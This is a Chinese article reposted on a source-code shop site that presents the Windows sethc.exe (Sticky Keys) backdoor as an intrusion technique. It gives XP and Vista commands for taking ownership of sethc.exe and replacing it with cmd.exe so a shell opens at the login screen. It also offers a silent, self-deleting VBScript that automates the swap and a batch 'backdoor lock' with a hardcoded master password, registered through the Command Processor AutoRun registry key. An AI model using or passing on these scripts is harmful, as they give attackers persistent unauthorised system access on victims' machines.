源码网商城,靠谱的源码在线交易网站 我的订单 购物车 帮助

源码网商城

申请开店
全部源码分类
首页 源码街 任务需求 版权中心 备案服务 商家入驻

变态入侵之有史以来最酷的Windows后门sethc.exe

  • 时间:2022-11-06 14:43 编辑: 来源: 阅读:
  • 扫一扫,手机访问
摘要:变态入侵之有史以来最酷的Windows后门sethc.exe
后门原理:  在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。  XP:  将安装源光盘弹出(或将硬盘上的安装目录改名)  cd %widnir%\system32\dllcache  ren sethc.exe *.ex~  cd %widnir%\system32  copy /y cmd.exe sethc.exe  VISTA:  takeown /f c:\windows\system32\sethc.exe  cacls c:\windows\system32\sethc.exe /G administrator:F  然后按XP方法替换文件  在登录界面按5此SHIFT,出来cmd shell,然后……  后门扩展: 
[u]复制代码[/u] 代码如下:
Dim obj, success    Set obj = CreateObject("WScript.Shell")    success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True)    success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)    success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)    success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)    success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)    success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)   
第二句最有意思了.自动应答....以前就遇到过类似的问题  再更新.加个自删除,简化代码...  
[u]复制代码[/u] 代码如下:
On Error Resume Next    Dim obj, success    Set obj = CreateObject("WScript.Shell")    success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)    CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)  
后门锁扩展:  allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证  用下面的后门锁的方法是 把代码保存为bdlock.bat  然后修改注册表位置即可 
[u]复制代码[/u] 代码如下:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]   "AutoRun"="bdlock.bat"   @Echo Off   title 后门登陆验证   color a   cls   set temprandom=%RANDOM%   echo 请输入验证码:%temprandom%   set/p check=   if "%check%"=="%temprandom%%temprandom%" goto passcheck   if "%check%"=="%temprandom%" (   rem 后门服务器验证   rem 如果没有后门验证服务器请rem注释掉下一行代码   if exist \192.168.8.8\backdoor$\pass goto passcheck   )   echo 验证失败   pause   exit   :passcheck   echo 验证成功   If "%passcmdlock%"=="http://blog.csdn.net/freexploit/" Goto endx   Set passcmdlock=http://blog.csdn.net/freexploit/   :allyesno   Set Errorlevel=>nul   Echo 请输入验证密码?   Set password=allyesno Is a pig>nul   Set/p password=   rem 万能密码   if "%password%"=="allyesno is a sb" goto endx   If %time:~1,1%==0 Set timechange=a   If %time:~1,1%==1 Set timechange=b   If %time:~1,1%==2 Set timechange=c   If %time:~1,1%==3 Set timechange=d   If %time:~1,1%==4 Set timechange=e   If %time:~1,1%==5 Set timechange=f   If %time:~1,1%==6 Set timechange=g   If %time:~1,1%==7 Set timechange=h   If %time:~1,1%==8 Set timechange=i   If %time:~1,1%==9 Set timechange=j   set/a sum=%time:~1,1%+%time:~1,1%   Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul    If "%errorlevel%"=="0" cls&Echo 口令正确&Goto End   Echo 请联系客服咨询正确密码!&Goto allyesno   :End   Set password=>nul   Set Errorlevel=>nul   Echo   :endx  
  • 全部评论(0)
上一篇:整理比较全的Access SQL注入参考
下一篇:新编MS07004网页木马源码代码
关于我们 | 广告合作 | 联系我们 | 隐私条款 | 免责声明 | 网站地图

苏ICP备2024110244号-2      苏公网安备32050702011978号      增值电信业务经营许可证编号:苏B2-20251499   |  Copyright 2018 - 2025   源码网商城 (www.ymwmall.com) 版权所有

联系客服
客服电话:
400-000-3129
微信版

扫一扫进微信版
返回顶部